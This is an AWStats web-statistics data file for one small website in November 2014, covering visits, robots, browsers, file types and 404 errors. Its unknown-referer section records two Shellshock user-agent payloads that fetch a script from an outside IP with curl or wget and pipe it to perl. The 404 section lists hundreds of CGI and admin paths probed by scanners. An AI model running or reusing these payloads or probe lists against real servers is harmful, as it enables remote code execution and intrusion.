AWSTATS DATA FILE 6.8 (build 1.910)
# If you remove this file, all statistics for date 201411 will be lost/reset.

# Position (offset in bytes) in this file of beginning of each section for
# direct I/O access. If you made changes somewhere in this file, you should
# also remove completely the MAP section (AWStats will rewrite it at next
# update).
BEGIN_MAP 28
POS_GENERAL 1915                
POS_TIME 2592                
POS_VISITOR 23100               
POS_DAY 26502               
POS_DOMAIN 3323                
POS_LOGIN 3694                
POS_ROBOT 3849                
POS_WORMS 4259                
POS_EMAILSENDER 4390                
POS_EMAILRECEIVER 4533                
POS_SESSION 27186               
POS_SIDER 27353               
POS_FILETYPES 4668                
POS_OS 4838                
POS_BROWSER 4958                
POS_SCREENSIZE 5275                
POS_UNKNOWNREFERER 5349                
POS_UNKNOWNREFERERBROWSER 6181                
POS_ORIGIN 6524                
POS_SEREFERRALS 6659                
POS_PAGEREFS 6814                
POS_SEARCHWORDS 7048                
POS_KEYWORDS 7258                
POS_MISC 2256                
POS_ERRORS 7377                
POS_CLUSTER 3550                
POS_SIDER_404 7502                
POS_PLUGIN_geoip_city_maxmind 22227               
END_MAP

# LastLine    = Date of last record processed - Last record line number in last log - Last record offset in last log - Last record signature value
# FirstTime   = Date of first visit for history file
# LastTime    = Date of last visit for history file
# LastUpdate  = Date of last update - Nb of parsed records - Nb of parsed old records - Nb of parsed new records - Nb of parsed corrupted - Nb of parsed dropped
# TotalVisits = Number of visits
# TotalUnique = Number of unique visitors
# MonthHostsKnown   = Number of hosts known
# MonthHostsUnKnown = Number of hosts unknown
BEGIN_GENERAL 8
LastLine 20141201002401 25 4606 3276815029887
FirstTime 20141101113958
LastTime 20141130113652
LastUpdate 20141201051402 25 0 24 0 0
TotalVisits 90                  
TotalUnique 84                  
MonthHostsKnown 0                   
MonthHostsUnknown 88                  
END_GENERAL

# Misc ID - Pages - Hits - Bandwidth
BEGIN_MISC 10
QuickTimeSupport 0 0 0
JavaEnabled 0 0 0
JavascriptDisabled 0 0 0
PDFSupport 0 0 0
WindowsMediaPlayerSupport 0 0 0
AddToFavourites 0 0 0
RealPlayerSupport 0 0 0
TotalMisc 0 0 0
DirectorSupport 0 0 0
FlashSupport 0 0 0
END_MISC

# Hour - Pages - Hits - Bandwidth - Not viewed Pages - Not viewed Hits - Not viewed Bandwidth
BEGIN_TIME 24
0 4 43 430626 10 11 5481
1 3 3 975 833 834 563694
2 4 4 1300 11 12 15066
3 7 57 706489 19 19 15716
4 3 15 383462 14 15 66244
5 2 2 325 12 14 12256
6 9 34 429848 17 18 15521
7 2 27 411229 18 25 258969
8 0 0 0 12 22 100243
9 3 42 430301 12 13 28560
10 5 70 872795 7 7 9195
11 34 71 437046 11 11 11405
12 3 3 7889 20 29 289556
13 7 73 1234852 16 16 33422
14 1 1 325 10 13 14763
15 1 1 325 14 14 27161
16 4 80 856622 10 10 3411
17 0 1 9289 12 14 141378
18 9 59 737663 12 14 96349
19 6 68 1111682 20 23 37670
20 1 3 26341 18 32 496888
21 3 28 430592 17 22 49711
22 1 1 325 13 21 244197
23 1 1 325 19 21 37604
END_TIME

# Domain - Pages - Hits - Bandwidth
# The 10 first Pages must be first (order not required for others)
BEGIN_DOMAIN 12
unknown 57 387 4691696
us 22 92 894518
ar 17 190 2901210
de 6 6 20663
lv 3 3 650
cz 2 2 650
fr 2 2 650
rs 1 1 325
cn 1 1 325
ru 1 1 325
es 0 1 9289
eu 1 1 325
END_DOMAIN

# Cluster ID - Pages - Hits - Bandwidth
BEGIN_CLUSTER 0
END_CLUSTER

# Login - Pages - Hits - Bandwidth - Last visit
# The 10 first Pages must be first (order not required for others)
BEGIN_LOGIN 0
END_LOGIN

# Robot ID - Hits - Bandwidth - Last visit - Hits on robots.txt
# The 10 first Hits must be first (order not required for others)
BEGIN_ROBOT 8
googlebot 125 1254609 20141130205553 0
bot[+:,\.\;\/\\-] 82 612702 20141130201827 0
no_user_agent 22 6825 20141130053906 0
surveybot 4 15128 20141123232121 0
netcraft 4 7564 20141107225305 0
java 1 325 20141126174313 0
msnbot 1 325 20141113122114 0
crawl 1 325 20141104123313 0
END_ROBOT

# Worm ID - Hits - Bandwidth - Last visit
# The 5 first Hits must be first (order not required for others)
BEGIN_WORMS 0
END_WORMS

# EMail - Hits - Bandwidth - Last visit
# The 20 first Hits must be first (order not required for others)
BEGIN_EMAILSENDER 0
END_EMAILSENDER

# EMail - Hits - Bandwidth - Last visit
# The 20 first hits must be first (order not required for others)
BEGIN_EMAILRECEIVER 0
END_EMAILRECEIVER

# Files type - Hits - Bandwidth - Bandwidth without compression - Bandwidth after compression
BEGIN_FILETYPES 7
css 38 127720 0 0
png 415 4021441 0 0
html 113 433486 0 0
js 100 3901518 0 0
xml 15 32955 0 0
jpg 4 3420 0 0
gif 2 86 0 0
END_FILETYPES

# OS ID - Hits
BEGIN_OS 8
macosx 62
winlong 2
winxp 14
win2003 8
win2000 1
winnt 178
Unknown 111
linux 311
END_OS

# Browser ID - Hits
BEGIN_BROWSER 21
firefox32.0 1
msie6.0 11
firefox21.0 1
curl 1
firefox30.0 12
firefox12.0 1
firefox31.0 1
firefox2.0.0.11 1
nokia 70
firefox33.0 3
firefox25.0 1
mozilla 3
firefox1.0 2
msie7.0 8
firefox14.0.1 4
firefox23.0 1
firefox9.0.1 1
firefox3.6.3 1
wget 1
Unknown 36
safari 527
END_BROWSER

# Screen size - Hits
BEGIN_SCREENSIZE 0
END_SCREENSIZE

# Unknown referer OS - Last visit date
BEGIN_UNKNOWNREFERER 10
Mozilla/5.0_(Windows_Phone_8.1;_ARM;_Trident/7.0;_Touch;_rv:11.0;_IEMobile/11.0;_NOKIA;_Lumia_520)_like_Gecko 20141111104440
StatsInfo 20141125065521
()_{_:;_};_curl_http://61.159.232.119/.b/index.jpg_|_perl 20141128010127
masscan/1.0_(https://github.com/robertdavidgraham/masscan) 20141129092454
()_{_:;_};_wget_-qO_-_http://61.159.232.119/.b/index.jpg_|_perl 20141128010035
Mozilla/5.0_(compatible;_Muenster_University_of_Applied_Sciences;__http://fb02itsscan.fh-muenster.de) 20141117163813
Go_1.1_package_http 20141111031629
Mozilla/5.0_(compatible;_WebMasterAid/1.0;__http://wmaid.com/en/explore/) 20141103183652
BlackBerry9000/4.6.0.167_Profile/MIDP-2.0_Configuration/CLDC-1.1_VendorID/102_ips-agent 20141106061218
NerdyBot 20141130113652
END_UNKNOWNREFERER

# Unknown referer Browser - Last visit date
BEGIN_UNKNOWNREFERERBROWSER 5
StatsInfo 20141125065521
BlackBerry9000/4.6.0.167_Profile/MIDP-2.0_Configuration/CLDC-1.1_VendorID/102_ips-agent 20141106061218
masscan/1.0_(https://github.com/robertdavidgraham/masscan) 20141129092454
Go_1.1_package_http 20141111031629
NerdyBot 20141130113652
END_UNKNOWNREFERERBROWSER

# Origin - Pages - Hits 
BEGIN_ORIGIN 6
From0 85 91
From1 3 3
From2 6 8
From3 2 2
From4 17 583
From5 0 0
END_ORIGIN

# Search engine referers ID - Pages - Hits
BEGIN_SEREFERRALS 1
google 6 8
END_SEREFERRALS

# External page referers - Pages - Hits
# The 10 first Pages must be first (order not required for others)
BEGIN_PAGEREFS 2
http://mawords.com/cacaceasoc.com 1 1
http://wmaid.com/en/explore/cacaceasoc.com/ 1 1
END_PAGEREFS

# Search keyphrases - Number of search
# The 10 first number of search must be first (order not required for others)
BEGIN_SEARCHWORDS 2
%63%61%63%61%63%65+%61%73%6f%63%69%61%64%6f%73 1
tobbot 1
END_SEARCHWORDS

# Search keywords - Number of search
# The 10 first number of search must be first (order not required for others)
BEGIN_KEYWORDS 3
%63%61%63%61%63%65 1
%61%73%6f%63%69%61%64%6f%73 1
tobbot 1
END_KEYWORDS

# Errors - Hits - Bandwidth
BEGIN_ERRORS 4
403 4 2612
206 4 51612
400 41 9266
404 941 613167
END_ERRORS

# URL with 404 errors - Hits - Last URL referer
BEGIN_SIDER_404 432
/cgi-bin/badmin.cgi 2 ()%20{%20:
/admin.php 3 -
/cgi-bin/webcart/webcart.cgi 2 ()%20{%20:
/ez2000/ezboard.cgi 2 ()%20{%20:
/cgi-bin/store/index.cgi 2 ()%20{%20:
/cart.cgi 2 ()%20{%20:
/wwwadmin.cgi 2 ()%20{%20:
/xul/ 2 ()%20{%20:
/cgi-bin/cbmc/forums.cgi 2 ()%20{%20:
/cgi-bin/ezshopper/search.cgi 2 ()%20{%20:
/cgi-bin/build.cgi 2 ()%20{%20:
/cgi-bin/csLiveSupport.cgi 2 ()%20{%20:
/xmlrpc.php 1 -
/cgi-bin/tidfinder.cgi 2 ()%20{%20:
/cgi-bin/a1disp3.cgi 2 ()%20{%20:
/cgi-bin/csSearch.cgi 2 ()%20{%20:
/users/scripts/submit.cgi 2 ()%20{%20:
/Web_Store/web_store.cgi 2 ()%20{%20:
/cgi-bin/snorkerz.batHTTP/1.0 2 -
/cgi-bin/bulk/bulk.cgi 2 ()%20{%20:
/cgi-bin/viewcvs.cgi 2 ()%20{%20:
/cgi-bin/shop.cgi 2 ()%20{%20:
/cgi-bin/environ.cgi 2 ()%20{%20:
/cgi-bin/urlcount.cgi 2 ()%20{%20:
/webtools/bonsai/ccvsblame.cgi 2 ()%20{%20:
/reviews/newpro.cgi 2 ()%20{%20:
/cgi-bin/wrap.cgi 2 ()%20{%20:
/cgi-bin/profile.cgi 2 ()%20{%20:
/cgi-bin/tree.php 2 ()%20{%20:
/index.cgi 2 ()%20{%20:
/rom-0 1 -
/cgi-bin/enter.cgi 2 ()%20{%20:
/cgi-bin/bannereditor.cgi 2 ()%20{%20:
/cgi-sys/entropysearch.cgi 5 -
/cgi-bin/traffic.cgi 2 ()%20{%20:
/submit.cgi 2 ()%20{%20:
/cgi-bin/webif.cgi 2 ()%20{%20:
/HNAP1/ 4 http://162.215.248.220/
/cgi-sys/helpdesk.cgi 2 ()%20{%20:
/cgi-bin/addbanner.cgi 2 ()%20{%20:
/administrator/ 3 -
/cgi-bin/mailnews.cgi 2 ()%20{%20:
/cgi-bin/mt/mt-load.cgi 2 ()%20{%20:
/cgi-bin/cachemgr.cgi 2 ()%20{%20:
/photo/manage.cgi 2 ()%20{%20:
/cgi-bin/tigvote.cgi 2 ()%20{%20:
/wp-login.php 5 -
/cgi-bin/shopplus.cgi 2 ()%20{%20:
/cgi-bin/ezadmin.cgi 2 ()%20{%20:
/process_bug.cgi 2 ()%20{%20:
/cgi-bin/FileSeek.cgi 2 ()%20{%20:
/cgi-bin/sendform.cgi 2 ()%20{%20:
/cgi-bin/aglimpse.cgi 2 ()%20{%20:
/cgi-bin/webdist.cgi 2 ()%20{%20:
/cgi-bin/search/search.cgi 2 ()%20{%20:
/login.cgi 2 ()%20{%20:
/cgi-bin/ccvsblame.cgi 2 ()%20{%20:
/dec_234.pdf 1 -
/cgi-bin/myguestbook.cgi 2 ()%20{%20:
/cgi-bin/photo/manage.cgi 2 ()%20{%20:
/cgi-bin/php 2 ()%20{%20:
/cgi-sys/mchat.cgi 2 ()%20{%20:
/cgi-bin/gm-authors.cgi 2 ()%20{%20:
/cgi-bin/pbcgi.cgi 2 ()%20{%20:
/cgi-bin/upload.cgi 2 ()%20{%20:
/cgi-bin/logit.cgi 2 ()%20{%20:
/cgi-bin/bb-hostsvc.shHTTP/1.0 2 -
/cgi-bin/csGuestBook.cgi 2 ()%20{%20:
/dec_258.pdf 1 -
/dcadmin.cgi 2 ()%20{%20:
/cgi-bin/gm.cgi 2 ()%20{%20:
/quikmail/nph-emumail.cgi 2 ()%20{%20:
/cgi-bin/whois_raw.cgi 2 ()%20{%20:
/cp/rac/nsManager.cgi 2 ()%20{%20:
/_mt/mt.cgi 2 ()%20{%20:
/parse_xml.cgi 2 ()%20{%20:
/cgi-bin/cartmanager.cgi 2 ()%20{%20:
/cgi-bin/.namazu.cgi 2 ()%20{%20:
/cgi-bin/moin.cgi 2 ()%20{%20:
/cgi-bin/handler.cgi 2 ()%20{%20:
/cgi-bin/whois/whois.cgi 2 ()%20{%20:
/cgi-bin/bslist.cgi 2 ()%20{%20:
/cgi-bin/book.cgi 2 ()%20{%20:
/cgi-bin/ImageFolio/admin/admin.cgi 2 ()%20{%20:
/cgi-bin/fom.cgi 2 ()%20{%20:
/cgi-bin/bb-hist.shHTTP/1.0 2 -
/cgi-bin/postcards.cgi 2 ()%20{%20:
/dcboard.cgi 2 ()%20{%20:
/cgi-bin/CSMailto/CSMailto.cgi 2 ()%20{%20:
/webtools/bonsai/cvsblame.cgi 2 ()%20{%20:
/dcforum/dcforum.cgi 2 ()%20{%20:
/cgi-bin/classified.cgi 2 ()%20{%20:
/wwwboard.cgi 2 ()%20{%20:
/cgi-bin/admin/setup.cgi 2 ()%20{%20:
/cgi-bin/webmap.cgi 2 ()%20{%20:
/cgi-bin/cvsquery.cgi 2 ()%20{%20:
/cgi-sys/realhelpdesk.cgi 2 ()%20{%20:
/cgi-bin/jammail.plHTTP/1.0 2 -
/cgi-bin/classifieds.cgi 2 ()%20{%20:
/cgi-bin/htsearch.cgi 2 ()%20{%20:
/cgi-bin/download.cgi 2 ()%20{%20:
/cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi 2 ()%20{%20:
/cgi-bin/banner.cgi 2 ()%20{%20:
/cgi-bin/way-board.cgi 2 ()%20{%20:
/cgi-bin/mojo/mojo.cgi 2 ()%20{%20:
/cgi-bin/main.cgi 2 ()%20{%20:
/cgi-bin/blog/mt-load.cgi 2 ()%20{%20:
/robots.txt 72 -
/cgi-bin/gbook/gbook.cgi 2 ()%20{%20:
/webtools/bonsai/cvsqueryform.cgi 2 ()%20{%20:
/cgi-bin/robadmin.cgi 2 ()%20{%20:
/cgi-bin/ezboard.cgi 2 ()%20{%20:
/cgi-bin/register.cgi 2 ()%20{%20:
/cgi-bin/faqmanager.cgi 2 ()%20{%20:
/cgi-bin/html2wml.cgi 2 ()%20{%20:
/cgi-bin/newsdesk.cgi 2 ()%20{%20:
/cgi-sys/defaultwebpage.cgi 4 ()%20{%20:
/shop/member_html.cgi 2 ()%20{%20:
/left.cgi 2 ()%20{%20:
/cgi-sys/FormMail-clone.cgi 4 ()%20{%20:
/details.cgi 2 ()%20{%20:
/cgi-bin/journal.cgi 2 ()%20{%20:
/enter_bug.cgi 2 ()%20{%20:
/servers/link.cgi 2 ()%20{%20:
/sys-cgi 2 ()%20{%20:
/cgi-bin/Count.cgi 2 ()%20{%20:
/jyjy/jyj/jy.php 1 -
/gitweb/gitweb.cgi 2 ()%20{%20:
/shop/normal_html.cgi 2 ()%20{%20:
/cgi-bin/log-reader.cgi 2 ()%20{%20:
/cgi-bin/hsx.cgi 2 ()%20{%20:
/cgi-bin/perlshop.cgi 2 ()%20{%20:
/cgi-bin/csNews.cgi 2 ()%20{%20:
/ROADS/cgi-bin/search.plHTTP/1.0 2 -
/cgi-bin/smartsearch/smartsearch.cgi 2 ()%20{%20:
/cgi-bin/ikonboard/help.cgi 2 ()%20{%20:
/cgi-bin/auktion.cgi 2 ()%20{%20:
/cgi-bin/MachineInfoHTTP/1.0 2 -
/cgi-bin/showcheckins.cgi 2 ()%20{%20:
/o/ 1 -
/debug.cgi 2 ()%20{%20:
/cgi-bin/smartsearch.cgi 2 ()%20{%20:
/cgi-bin/ezman.cgi 2 ()%20{%20:
/cgi-bin/flexform.cgi 2 ()%20{%20:
/cgi-bin/emu/html/emumail.cgi 2 ()%20{%20:
/sample04.cgi 2 ()%20{%20:
/cgi-bin/guestbook.cgi 2 ()%20{%20:
/cgi-bin/axs.cgi 2 ()%20{%20:
/cgi-bin/publisher/search.cgi 2 ()%20{%20:
/cgi-bin/bb-histlog.shHTTP/1.0 2 -
/cgi-bin/ttawebtop.cgi/HTTP/1.0 2 -
/cgi-bin/auction/auction.cgi 2 ()%20{%20:
/webtools/bonsai/cvsquery.cgi 2 ()%20{%20:
/cgi-bin/login.cgi 2 ()%20{%20:
/cgi-bin/BBS/bbs_forum.cgi 2 ()%20{%20:
/cgi-bin/talkback.cgi 2 ()%20{%20:
/cgi-bin/netpad.cgi 2 ()%20{%20:
/jackposprivate12/bins.php 1 -
/cgi-bin/viralator.cgi 2 ()%20{%20:
/cgi-bin/cgi_processHTTP/1.0 2 -
http://hotel.qunar.com/render/hoteldiv.jsp 1 http://hotel.qunar.com/
/cgi-bin/lookwho.cgi 2 ()%20{%20:
/megabook/admin.cgi 2 ()%20{%20:
/cgi-bin/csv_db.cgi 2 ()%20{%20:
/cgi-bin/admin.html 2 ()%20{%20:
/cgi-bin/technote/main.cgi 2 ()%20{%20:
/mods/apage/apage.cgi 2 ()%20{%20:
/cgi-bin/php4 2 ()%20{%20:
/dec_248.pdf 1 -
/cgi-bin/firmwarecfg 2 ()%20{%20:
/cgi-bin/test2.plHTTP/1.0 2 -
/cgi-bin/emumail.cgi 2 ()%20{%20:
/print.cgi 2 ()%20{%20:
/cgi-bin/dcforum.cgi 2 ()%20{%20:
/phpMyAdmin-2.10.3-english/scripts/setup.php 1 -
/cgi-bin/way-board/way-board.cgi 2 ()%20{%20:
/cgi-bin/php-cgi 2 ()%20{%20:
/cgi-bin/FileSeek2.cgi 2 ()%20{%20:
/cgi-bin/ezshopper/loadpage.cgi 2 ()%20{%20:
/cgi-mod/index.cgi 2 ()%20{%20:
/cgi-bin-sdb/printenvHTTP/1.0 2 -
/musicqueue.cgi 2 ()%20{%20:
/cgi-bin/shopper.cgi 2 ()%20{%20:
/cgi-bin/testing_whateverHTTP/1.0 2 -
/www.cacaceasoc.com/El_Estudio_files/droppedImage.png 1 -
/cgi-bin/main_menu.plHTTP/1.0 2 -
/cgi-bin/FormMail.cgi 2 ()%20{%20:
/cgi-bin/quizme.cgi 2 ()%20{%20:
/cgi-bin/imageFolio.cgi 2 ()%20{%20:
/cgi-bin/dfire.cgi 2 ()%20{%20:
/cgi-bin/searchHTTP/1.0 2 -
/pma/scripts/setup.php 2 -
/cgi-bin/test/test.cgi 2 ()%20{%20:
/cgi-bin/musicqueue.cgi 2 ()%20{%20:
/cgi-bin/day5datacopier.cgi 2 ()%20{%20:
/cgi-bin/cvslog.cgi 2 ()%20{%20:
/cgi-bin/bb-replog.shHTTP/1.0 2 -
/cgi-bin/test.cgi 2 ()%20{%20:
/cgi-bin/mt-static/mt-load.cgi 2 ()%20{%20:
/cgi-bin/bigconf.cgi 2 ()%20{%20:
/cgi-bin/bb-rep.shHTTP/1.0 2 -
/cgi-bin/pfdisplay.cgi 2 ()%20{%20:
/cgi-bin/.cobalt/message/message.cgi 2 ()%20{%20:
/cgi-bin/handler/netsonarHTTP/1.0 2 -
/cgi-bin/cached_feed.cgi 2 ()%20{%20:
/cgi-bin/14all-1.1.cgi 2 ()%20{%20:
/quikstore.cgi 2 ()%20{%20:
/cgi-bin/ezshopper3/loadpage.cgi 2 ()%20{%20:
/cgi-bin/finger.cgi 2 ()%20{%20:
/gitweb.cgi 2 ()%20{%20:
/html/cgi-bin/cgicsoHTTP/1.0 2 -
/cgi-bin/nph-emumail.cgi 2 ()%20{%20:
/newpro.cgi 2 ()%20{%20:
/cgi-sys/domainredirect.cgi 2 ()%20{%20:
/cgi-bin/pagelog.cgi 2 ()%20{%20:
/cgi-bin/html2chtml.cgi 2 ()%20{%20:
/cgi-bin/infosrch.cgi 2 ()%20{%20:
/cgi-bin/classifieds/index.cgi 2 ()%20{%20:
/cgi-bin/wrapHTTP/1.0 2 -
/cgi-bin/photo/protected/manage.cgi 2 ()%20{%20:
/cgi-bin/admin.plHTTP/1.0 2 -
/cgi-bin/dig.cgi 2 ()%20{%20:
/cgi-bin/probecontrol.cgi 2 ()%20{%20:
/cgi-bin/day5datanotifier.cgi 2 ()%20{%20:
/site_searcher.cgi 2 ()%20{%20:
/sample01.cgi 2 ()%20{%20:
/hitmatic/analyse.cgi 2 ()%20{%20:
/cgi-bin/pfdispaly.cgi 2 ()%20{%20:
/cgi-bin/diagnose.cgi 2 ()%20{%20:
/cgi-bin/survey.cgi 2 ()%20{%20:
/cgi-bin/.cobalt/alert/service.cgi 2 ()%20{%20:
/cgi-bin/lwgate.cgi 1 ()%20{%20:
/pub/english.cgi 2 ()%20{%20:
/cgi-bin/hitview.cgi 2 ()%20{%20:
/cgi-bin/quickstore.cgi 2 ()%20{%20:
/cgi-bin/getdoc.cgi 2 ()%20{%20:
/cgi-bin/mt-static/mt-check.cgi 2 ()%20{%20:
/cgi-bin/hello 2 ()%20{%20:
/info.cgi 2 ()%20{%20:
/upload.cgi 2 ()%20{%20:
/cgi-bin/wwwboard.cgi.cgi 2 ()%20{%20:
/cgi-bin/spin_client.cgi 2 ()%20{%20:
/cgi-bin/commandit.cgi 2 ()%20{%20:
/photodata/manage.cgi 2 ()%20{%20:
/apps/web/vs_diag.cgi 2 ()%20{%20:
/cgi-bin/emumail/emumail.cgi 2 ()%20{%20:
/webtools/bonsai/showcheckins.cgi 2 ()%20{%20:
/cgi-bin/compatible.cgi 2 ()%20{%20:
/fcgi-bin/echo2HTTP/1.0 2 -
/cgi-bin/boozt/admin/index.cgi 2 ()%20{%20:
/cgi-bin/csPassword.cgi 2 ()%20{%20:
/cgi-bin/robpoll.cgi 2 ()%20{%20:
/cgi-bin/ratlog.cgi 2 ()%20{%20:
/cgi-bin/sojourn.cgi 2 ()%20{%20:
/test.cgi 2 ()%20{%20:
/cgi-bin/14all.cgi 2 ()%20{%20:
/cgi-bin/af.cgi 2 ()%20{%20:
/checkupdate.asmx 2 -
/userreg.cgi 2 ()%20{%20:
/phpMyAdmin/scripts/setup.php 2 -
/cgi-bin/nlog-smb.cgi 2 ()%20{%20:
/bqtiwasxkdnq.html 1 -
/cgi-bin/simplestmail.cgi 2 ()%20{%20:
/gitweb/ 2 ()%20{%20:
/cgi-bin/phf.cgi 2 ()%20{%20:
/cgi-bin/start.cgi 2 ()%20{%20:
/agora.cgi 2 ()%20{%20:
/cgi-bin/add_ftp.cgi 2 ()%20{%20:
/technote/print.cgi 2 ()%20{%20:
/cgi-bin/gbadmin.cgi 2 ()%20{%20:
/cgi-bin/r.cgi 2 ()%20{%20:
/cgi-bin/ICuGI/EST/blast_detail.cgi 2 ()%20{%20:
/ccbill/whereami.cgi 2 ()%20{%20:
/cgi-sys/suspendedpage.cgi 2 ()%20{%20:
/cgi-bin/troops.cgi 2 ()%20{%20:
/edittag/edittag.cgi 2 ()%20{%20:
/cgi-bin/vpasswd.cgi 2 ()%20{%20:
/cgi-sys/randhtml.cgi 2 ()%20{%20:
/ministats/admin.cgi 2 ()%20{%20:
/wp-admin/admin-ajax.php 1 -
/cgi-bin/mail/nph-mr.cgi 2 ()%20{%20:
/administrator.cgi 2 ()%20{%20:
/cgi-bin/replicator/webpage.cgi/HTTP/1.0 2 -
/analyse.cgi 2 ()%20{%20:
/aktivate/cgi-bin/catgy.cgi 2 ()%20{%20:
/cgi-bin/simplestguest.cgi 2 ()%20{%20:
/dana-na/auth/url_default/welcome.cgi 2 ()%20{%20:
/tmUnblock.cgi 4 ()%20{%20:
/cgi-bin/scoadminreg.cgi 2 ()%20{%20:
/cgi-bin/zml.cgi 2 ()%20{%20:
/cgi-bin/YaBB/YaBB.cgi 2 ()%20{%20:
/cgi-bin/status/status.cgi 2 ()%20{%20:
/cgi-bin/adduser.cgi 2 ()%20{%20:
/cgi-sys/ 2 ()%20{%20:
/cgi-bin/handlerHTTP/1.0 2 -
/cgi-bin/architext_query.cgi 2 ()%20{%20:
/cgi-bin/admin.cgi 2 ()%20{%20:
/cgi-bin/generate.cgi 2 ()%20{%20:
/cgi-bin/store.cgi 2 ()%20{%20:
/cgi-bin/status 2 ()%20{%20:
/cgi-bin/directorypro.cgi 2 ()%20{%20:
/cgi-bin/cgi.cgi 2 ()%20{%20:
/cgi-bin/nph-exploitscanget.cgi 2 ()%20{%20:
/newsletter.shHTTP/1.0 2 -
/cgi-bin/bnbform.cgi 2 ()%20{%20:
/cgi-bin/a1stats/a1disp3.cgi 2 ()%20{%20:
/cgi-bin/csChatRBox.cgi 2 ()%20{%20:
/bandwidth/index.cgi 2 ()%20{%20:
/cgi-bin/%2f/admin.html 2 ()%20{%20:
/b2-include/b2edit.showposts.php 2 ()%20{%20:
/cgi-bin/ultraboard.cgi 2 ()%20{%20:
/cgi-bin/webspirs.cgi 2 ()%20{%20:
/cgi-bin/admin/admin.cgi 2 ()%20{%20:
/cgi-bin/vote.cgi 2 ()%20{%20:
/cartcart.cgi 2 ()%20{%20:
/dxnnumagczak.html 1 -
/template.cgi 2 ()%20{%20:
/cgi-bin/dbman/db.cgi 2 ()%20{%20:
/cgi-bin/virgil.cgi 2 ()%20{%20:
/cgi-bin/snorkerz.cmdHTTP/1.0 2 -
/cgi-bin/maillist.cgi 2 ()%20{%20:
/cgi-bin/mrtg.cgi 2 ()%20{%20:
/scancfg.cgi 2 ()%20{%20:
/cgi-bin/calendar/index.cgi 2 ()%20{%20:
/download.cgi 2 ()%20{%20:
/cgistartHTTP/1.0 2 -
/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi 2 ()%20{%20:
/cgi-bin/mt/mt-check.cgi 2 ()%20{%20:
/cgi-sys/entropybanner.cgi 2 ()%20{%20:
/cgi-bin/gm-cplog.cgi 2 ()%20{%20:
/create_release.shHTTP/1.0 2 -
/SetSecurity.shmHTTP/1.0 2 -
/cgi-bin/cgforum.cgi 2 ()%20{%20:
/cgi-bin/fom/fom.cgi 2 ()%20{%20:
/cgi-bin/whois.cgi 2 ()%20{%20:
/cgi-bin/a1stats/a1disp4.cgi 2 ()%20{%20:
/cgi-bin/magiccard.cgi 2 ()%20{%20:
/cgi-bin/nph-publish.cgi 2 ()%20{%20:
/mailview.cgi 2 ()%20{%20:
/cgi-bin/AT-generate.cgi 2 ()%20{%20:
/Gozila.cgi 2 ()%20{%20:
/cgi-bin/classifieds/classifieds.cgi 2 ()%20{%20:
/cgi-bin/bb-ack.shHTTP/1.0 2 -
/dec_235.pdf 1 -
/sample03.cgi 2 ()%20{%20:
/cgi-bin/FormHandler.cgi 2 ()%20{%20:
/kwkw/kwk/kw.php 1 -
/dec_212.pdf 1 -
/connector.cgi 2 ()%20{%20:
/cgi-bin/ax.cgi 2 ()%20{%20:
/page.cgi 2 ()%20{%20:
/ez2000/ezadmin.cgi 2 ()%20{%20:
/myadmin/scripts/setup.php 2 -
/cgi-bin/mmstdod.cgi 2 ()%20{%20:
/cgi-bin/test-cgi 4 ()%20{%20:
/cgi-bin/cvsqueryform.cgi 2 ()%20{%20:
/www.cacaceasoc.com/Areas_de_Practica_files/droppedImage.png 10 -
/cgi-bin/webmail/html/emumail.cgi 2 ()%20{%20:
/cgi-bin/php.cgi 4 ()%20{%20:
/cgi-bin/ezshopper2/loadpage.cgi 2 ()%20{%20:
/cgi-bin/AT-admin.cgi 2 ()%20{%20:
/cgi-bin/printenvHTTP/1.0 2 -
/webtools/bonsai/cvslog.cgi 2 ()%20{%20:
/cgi-bin/csNewsPro.cgi 2 ()%20{%20:
/cgi-bin/bbs_forum.cgi 2 ()%20{%20:
/hndUnblock.cgi 2 ()%20{%20:
/cgi-bin/powerup/r.cgi 2 ()%20{%20:
/cgi-bin/ax-admin.cgi 2 ()%20{%20:
/cgi-bin/php5 2 ()%20{%20:
/emumail.cgi 2 ()%20{%20:
/dcforum.cgi 2 ()%20{%20:
/axis-cgi/buffer/command.cgi 2 ()%20{%20:
/cgi-bin/responder.cgi 2 ()%20{%20:
/csPassword.cgi 2 ()%20{%20:
/cgi-bin/db_manager.cgi 2 ()%20{%20:
/phpmyadmin/scripts/setup.php 1 -
/cgi-bin/store/agora.cgi 2 ()%20{%20:
/infosrch.cgi 2 ()%20{%20:
/cgi-bin/csPassword/csPassword.cgi 2 ()%20{%20:
/cgi-bin/blog/mt-check.cgi 2 ()%20{%20:
/cgi-bin/common/listrec.plHTTP/1.0 2 -
/oem_webstage/cgi-bin/oemapp_cgi 2 ()%20{%20:
/cgi-bin/bizdb1-search.cgi 2 ()%20{%20:
/fcgi-bin/echoHTTP/1.0 2 -
/ovgjgseygzvvxh.html 1 -
/cgi-bin/loadpage.cgi 2 ()%20{%20:
/cgi-bin/netauth.cgi 2 ()%20{%20:
/cgi-bin/webbbs.cgi 2 ()%20{%20:
/lqyefoea.html 1 -
/cgi-sys/addalink.cgi 2 ()%20{%20:
/cgi-bin/nph-test.cgi 2 ()%20{%20:
/ncbook.cgi 2 ()%20{%20:
/cgis/wwwboard/wwwboard.cgi 2 ()%20{%20:
/admin.cgi 2 ()%20{%20:
/sample02.cgi 2 ()%20{%20:
/phppath/php 2 -
/cgi-bin/gH.cgi 2 ()%20{%20:
/cgi-bin/astrocam.cgi 2 ()%20{%20:
/cgi-bin/if/admin/nph-build.cgi 2 ()%20{%20:
/cgi-bin/search.cgi 2 ()%20{%20:
/main.cgi 2 ()%20{%20:
/siteUserMod.cgi 2 ()%20{%20:
/cgi-bin/adminhot.cgi 2 ()%20{%20:
/cgi-bin/title.cgi 2 ()%20{%20:
/catalog/index.cgi 2 ()%20{%20:
/cgi-bin/cvsblame.cgi 2 ()%20{%20:
/cgi-bin/bsguest.cgi 2 ()%20{%20:
/cgi-sys/realsignup.cgi 2 ()%20{%20:
/cgi-bin/mini_logger.cgi 2 ()%20{%20:
/cgi-bin/w3mman2html.cgi 4 ()%20{%20:
/cgi-bin/commerce.cgi 2 ()%20{%20:
/cgi-bin/AnyBoard.cgi 2 ()%20{%20:
/cgi-bin/adminwww.cgi 2 ()%20{%20:
/cgi-bin/sbcgi/sitebuilder.cgi 2 ()%20{%20:
/bigconf.cgi 2 ()%20{%20:
/ez2000/ezman.cgi 2 ()%20{%20:
/Socios_%26_Profesionales.html 1 -
/cgi-bin/pollssi.cgi 2 ()%20{%20:
/cgi-bin/icatHTTP/1.0 2 -
